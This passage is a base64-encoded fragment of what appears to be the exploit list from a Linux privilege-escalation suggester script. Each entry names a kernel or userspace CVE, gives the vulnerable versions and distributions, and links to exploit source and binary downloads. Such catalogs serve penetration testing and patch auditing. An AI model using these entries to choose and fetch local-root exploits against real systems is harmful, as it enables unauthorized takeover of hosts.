NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKZXhwbG9pdC1kYjogNDA3NTkKYXV0aG9yOiBKYW5uIEhvcm4KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01MTk1XSR7dHh0cnN0fSBkaXJ0eWNvdwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV7a2VybmVsOjIuNi4oMTh8MjR8MzMpLSp9LFJIRUw9NntrZXJuZWw6Mi42LjMyLSp8My4oMHwyfDZ8OHwxMCkuKnwyLjYuMzMuOS1ydDMxfSxSSEVMPTd7a2VybmVsOjMuMTAuMC0qfDQuMi4wLTAuMjEuZWw3fSx1YnVudHU9MTYuMDR8MTQuMDR8MTIuMDQKUmFuazogNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9kaXJ0eWNvdy9kaXJ0eWNvdy5naXRodWIuaW8vd2lraS9WdWxuZXJhYmlsaXR5RGV0YWlscwpDb21tZW50czogRm9yIFJIRUwvQ2VudE9TIHNlZSBleGFjdCB2dWxuZXJhYmxlIHZlcnNpb25zIGhlcmU6IGh0dHBzOi8vYWNjZXNzLnJlZGhhdC5jb20vc2l0ZXMvZGVmYXVsdC9maWxlcy9yaC1jdmUtMjAxNi01MTk1XzUuc2gKZXhwbG9pdC1kYjogNDA2MTEKYXV0aG9yOiBQaGlsIE9lc3RlcgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yMix2ZXI8PTQuOC4zClRhZ3M6IGRlYmlhbj03fDgsUkhFTD01fDZ8Nyx1YnVudHU9MTQuMDR8MTIuMDQsdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjEtZ2VuZXJpY30sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCmV4dC11cmw6IGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLzQwODQ3CkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDgzOQphdXRob3I6IEZpcmVGYXJ0IChhdXRob3Igb2YgZXhwbG9pdCBhdCBFREIgNDA4MzkpOyBHYWJyaWVsZSBCb25hY2luaSAoYXV0aG9yIG9mIGV4cGxvaXQgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTg2NTVdJHt0eHRyc3R9IGNob2NvYm9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPDQuOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtKDIxfDIyfDI0fDI4fDMxfDM0fDM2fDM4fDQyfDQzfDQ1fDQ3fDUxKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTYvMTIvMDYvMQpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwYWJpbGl0eSBpcyBuZWVkZWQgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkcyB0byBiZSBlbmFibGVkCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvQ1ZFLTIwMTYtODY1NS9jaG9jb2JvX3Jvb3QKZXhwbG9pdC1kYjogNDA4NzEKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTk3OTNdJHt0eHRyc3R9IFNPX3tTTkR8UkNWfUJVRkZPUkNFClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjExLHZlcjw0LjguMTQsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvdHJlZS9tYXN0ZXIvQ1ZFLTIwMTYtOTc5MwpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi05NzkzL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcHMgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE5vIFNNRVAvU01BUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIFRlc3RlZCBpbiBRRU1VIG9ubHkKZXhwbG9pdC1kYjogNDE5OTUKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy02MDc0XSR7dHh0cnN0fSBkY2NwClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD00LjkuMTEsQ09ORklHX0lQX0RDQ1A9W215XQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtNjItZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAyLzIyLzMKQ29tbWVudHM6IFJlcXVpcmVzIEtlcm5lbCBiZSBidWlsdCB3aXRoIENPTkZJR19JUF9EQ0NQIGVuYWJsZWQuIEluY2x1ZGVzIHBhcnRpYWwgU01FUC9TTUFQIGJ5cGFzcwpleHBsb2l0LWRiOiA0MTQ1OAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTczMDhdJHt0eHRyc3R9IGFmX3BhY2tldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMC42LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC44LjAtKDM0fDM2fDM5fDQxfDQyfDQ0fDQ1KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jb20vMjAxNy8wNS9leHBsb2l0aW5nLWxpbnV4LWtlcm5lbC12aWEtcGFja2V0Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwga2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTczMDgvZXhwbG9pdApleHBsb2l0LWRiOiA0MTk5NAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTY5OTVdJHt0eHRyc3R9IGVCUEZfdmVyaWZpZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuOCxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogZGViaWFuPTkuMHtrZXJuZWw6NC45LjAtMy1hbWQ2NH0sZmVkb3JhPTI1fDI2fDI3LHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtODktZ2VuZXJpY30sdWJ1bnR1PSgxNi4wNHwxNy4wNCl7a2VybmVsOjQuKDh8MTApLjAtKDE5fDI4fDQ1KS1nZW5lcmljfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yaWNrbGFyYWJlZS5ibG9nc3BvdC5jb20vMjAxOC8wNy9lYnBmLWFuZC1hbmFseXNpcy1vZi1nZXQtcmVrdC1saW51eC5odG1sCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xNjk5NS9leHBsb2l0Lm91dApleHBsb2l0LWRiOiA0NTAxMAphdXRob3I6IFJpY2sgTGFyYWJlZQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAxMTJdJHt0eHRyc3R9IE5FVElGX0ZfVUZPClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQsdmVyPD00LjEzLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtKn0sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDgvMTMvMQpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcCBvciBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gU01FUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBkaXN0cm9zL2tlcm5lbHMKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xMDAwMTEyL2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMjUzXSR7dHh0cnN0fSBQSUVfc3RhY2tfY29ycnVwdGlvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMyx4ODZfNjQKVGFnczogUkhFTD02LFJIRUw9N3trZXJuZWw6My4xMC4wLTUxNC4yMS4yfDMuMTAuMC01MTQuMjYuMX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLnR4dApzcmMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDkvMjYvbGludXgtcGllLWN2ZS0yMDE3LTEwMDAyNTMvY3ZlLTIwMTctMTAwMDI1My5jCmV4cGxvaXQtZGI6IDQyODg3CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTUzMzNdJHt0eHRyc3R9IHJkc19hdG9taWNfZnJlZV9vcCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuMTMsY21kOmdyZXAgLXFpIHJkcyAvcHJvYy9tb2R1bGVzLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wfDQuOC4wfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vd2Jvd2xpbmcvOWQzMjQ5MmJkOTZkOWU3YzNiZjUyZTIzYTBhYzMwYTQvcmF3Lzk1OTMyNTgxOWM3ODI0OGE2NDM3MTAyYmIyODliYjg1NzhhMTM1Y2QvY3ZlLTIwMTgtNTMzMy1wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTgtNTMzMy9jdmUtMjAxOC01MzMzLmMKQ29tbWVudHM6IHJkcy5rbyBrZXJuZWwgbW9kdWxlIG5lZWRzIHRvIGJlIGxvYWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIHRhcmdldHMgYW5kIGJ5cGFzc2luZyBLQVNMUi4KYXV0aG9yOiB3Ym93bGluZyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xODk1NV0ke3R4dHJzdH0gc3VidWlkX3NoZWxsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjE1LHZlcjw9NC4xOS4yLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLGNtZDpbIC11IC91c3IvYmluL25ld3VpZG1hcCBdLGNtZDpbIC11IC91c3IvYmluL25ld2dpZG1hcCBdClRhZ3M6IHVidW50dT0xOC4wNHtrZXJuZWw6NC4xNS4wLTIwLWdlbmVyaWN9LGZlZG9yYT0yOHtrZXJuZWw6NC4xNi4zLTMwMS5mYzI4fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE3MTIKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NzEzMy56aXAKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEzMjcyL3BvYy5jCkNvbW1lbnRzOiBSZXF1aXJlcyBhbiBhY3RpdmUgUG9sS2l0IGFnZW50LgpleHBsb2l0LWRiOiA0NzEzMwpleHBsb2l0LWRiOiA0NzE2MwphdXRob3I6IEphbm4gSG9ybiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xNTY2Nl0ke3R4dHJzdH0gWEZSTV9VQUYKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMsdmVyPDUuMC4xOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MSxDT05GSUdfWEZSTT15ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2R1YXN5bnQuY29tL2Jsb2cvdWJ1bnR1LWNlbnRvcy1yZWRoYXQtcHJpdmVzYwpiaW4tdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZHVhc3ludC94ZnJtX3BvYy9yYXcvbWFzdGVyL2x1Y2t5MApDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZDsgQ09ORklHX1hGUk0gbmVlZHMgdG8gYmUgZW5hYmxlZAphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjczNjVdJHt0eHRyc3R9IGxpbnV4LWlzY3NpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD01LjExLjMsQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQhPXkKVGFnczogUkhFTD04ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuZ3JpbW0tY28uY29tLzIwMjEvMDMvbmV3LW9sZC1idWdzLWluLWxpbnV4LWtlcm5lbC5odG1sCnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9ncmltbS1jby9Ob3RRdWl0ZTBEYXlGcmlkYXkvemlwL3RydW5rCkNvbW1lbnRzOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRCBtdXN0IG5vdCBiZSBlbmFibGVkCmF1dGhvcjogR1JJTU0KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0zNDkwXSR7dHh0cnN0fSBlQlBGIEFMVTMyIGJvdW5kcyB0cmFja2luZyBmb3IgYml0d2lzZSBvcHMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTUuNyx2ZXI8NS4xMixDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0oMjV8MjZ8Mjd8Mjh8Mjl8MzB8MzF8MzJ8MzN8MzR8MzV8MzZ8Mzd8Mzh8Mzl8NDB8NDF8NDJ8NDN8NDR8NDV8NDZ8NDd8NDh8NDl8NTB8NTF8NTIpLSp9LHVidW50dT0yMS4wNHtrZXJuZWw6NS4xMS4wLTE2LSp9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5ncmFwbHNlY3VyaXR5LmNvbS9wb3N0L2tlcm5lbC1wd25pbmctd2l0aC1lYnBmLWEtbG92ZS1zdG9yeQpzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vY2hvbXBpZTEzMzcvTGludXhfTFBFX2VCUEZfQ1ZFLTIwMjEtMzQ5MC96aXAvbWFpbgpDb21tZW50czogQ09ORklHX0JQRl9TWVNDQUxMIG5lZWRzIHRvIGJlIHNldCAmJiBrZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCAhPSAxCmF1dGhvcjogY2hvbXBpZTEzMzcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0yMjU1NV0ke3R4dHJzdH0gTmV0ZmlsdGVyIGhlYXAgb3V0LW9mLWJvdW5kcyB3cml0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE5LHZlcjw9NS4xMi1yYzYKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGUuZ2l0aHViLmlvL3NlY3VyaXR5LXJlc2VhcmNoL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvd3JpdGV1cC5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9nb29nbGUvc2VjdXJpdHktcmVzZWFyY2gvbWFzdGVyL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvZXhwbG9pdC5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAyMS0yMjU1NS9leHBsb2l0LmMKQ29tbWVudHM6IGlwX3RhYmxlcyBrZXJuZWwgbW9kdWxlIG11c3QgYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDUwMTM1CmF1dGhvcjogdGhlZmxvdyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMPTV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMT